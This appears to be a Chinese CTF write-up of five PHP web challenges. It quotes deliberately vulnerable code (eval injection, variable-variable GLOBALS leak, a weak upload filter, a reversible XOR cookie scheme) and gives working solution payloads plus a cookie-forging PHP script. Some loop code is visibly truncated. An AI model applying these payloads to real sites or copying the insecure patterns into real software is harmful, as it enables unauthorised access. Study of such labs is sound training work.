题1:爆破-1,flag就在某六位变量中
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
解题:URL/?hello=GLOBALS
题2:爆破-2,flag不在变量中
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
解题:URL/?hello=file_get_contents('flag.php')
题3:爆破-3,这个真的是爆破
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
$_SESSION['nums'] = 0;
$_SESSION['time'] = time();
$_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120
解题:md5函数对数组处理的将返回空值,URL/?value[]=e&value[]=a,利用Burpsuite进行暴破,步骤见图:
题4 :Upload,想怎么传就怎么传,就是这么任性(tips:flag在flag.php中)
文件上传
文件上传
你可以随意上传文件
if($_SERVER["REQUEST_METHOD"] === "POST") :
?>
if (is_uploaded_file($_FILES["file"]["tmp_name"])):
$file = $_FILES['file'];
$name = $file['name'];
if (preg_match("/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$/", $name) ):
$data = file_get_contents($file['tmp_name']);
while($next = preg_replace("/<\\?/", "", $data)){
$next = preg_replace("/php/", "", $next);
if($data === $next) break;
$data = $next;
}
file_put_contents(dirname(__FILE__) . '/u/' . $name, $data);
chmod(dirname(__FILE__) . '/u/' . $name, 0644);
?>
endif;
endif;
?>
endif;
?>
解题:对上传文件过滤了“php”及“”,用大写PHP及
题5:Code,考脑洞,你能过么?
解题:URL/index.php?jpg=hei.jpg,查看源码有 if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '
echo "";
/*
* Can you find the flag file?
*
*/
?>
由“Created by PhpStorm”猜测该项目由PhpStorm生成,即存在自动生成 .idea 目录,可能存在源码泄露的问题,访问URL/.idea/workspace.xml,查看得知存在index.php,config.php,fl3g_ichuqiu.php三个文件,结合index.php的代码可通过URL/index.php?jpg=fl3gconfigichuqiu.php,并作base64_decode, 获得fl3g_ichuqiu.php的源码:
/**
* Created by PhpStorm.
* Date: 2015/11/16
* Time: 1:31
*/
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}function encrypt($txt,$key){
for($i=0;$i$tmp .= chr(ord($txt[$i])+10);
}
$txt = $tmp;
$rnd=random(4);
$key=md5($rnd.$key);
$s=0;
for($i=0;$iif($s == 32) $s = 0;
$ttmp .= $txt[$i] ^ $key[++$s];
}
return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
$txt=base64_decode($txt);
$rnd = substr($txt,0,4);
$txt = substr($txt,4);
$key=md5($rnd.$key);$s=0;
for($i=0;$iif($s == 32) $s = 0;
$tmp .= $txt[$i]^$key[++$s];
}
for($i=0;$i$tmp1 .= chr(ord($tmp[$i])-10);
}
return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
echo $flag;
}else{
setcookie('user',encrypt('guest',$key));
echo "╮(╯▽╰)╭";
}
?>
访问URL/fl3g_ichuqiu.php会生成一个名称为user的COOKIE,这个COOKIE值是‘guest’进行加密处理后得到的,将COOKIE值base64_decode得到的字符串,前4个字符为随机值$rnd,后5个字符为$newtxt(即chr(ord($txt[$i])+10)处理后的值)与$newkey (即md5($rnd.$key)处理后的值)中的5个字符异或得到的。据此可知只要把后5个字符与$newtxt进行异或就可得到$newkey的相应5个字符,因为'system'有6个字符,所以$newkey的第6个字符只能依次对0-9、a-f共16个字符进行chr(ord($txt[$i])+10)处理作为$newkey的第6个字符,与'system'进行异或并base64编码所得的值作为COOKIE的值,依次验证。以下帖上获取COOKIE的代码及使用burpsuite进行暴破的图:
$oriStr = base64_decode('bkFVMxAaWUxK'); // bkFVMxAaWUxK 是访问 fl3g_ichuqiu.php 生成的COOKIE值
$rnd = substr($oriStr, 0, 4);
$a = substr($oriStr, 4);
$b = 'guest';$ttmp = '';
for($i=0;$i$ttmp .= chr(ord($b[$i])+10) ^ $a[$i];
}$d = 'system';
$char1 = range(0, 9);
$char2 = range(a, f);
$char = array_merge($char1, $char2);
foreach ($char as $v) {
$c = $ttmp.$v;
$newStr = '';
for($i=0;$i$newStr .= $c[$i] ^ chr(ord($d[$i])+10);
}echo base64_encode($rnd.$newStr).'
';
}
查看更多》》》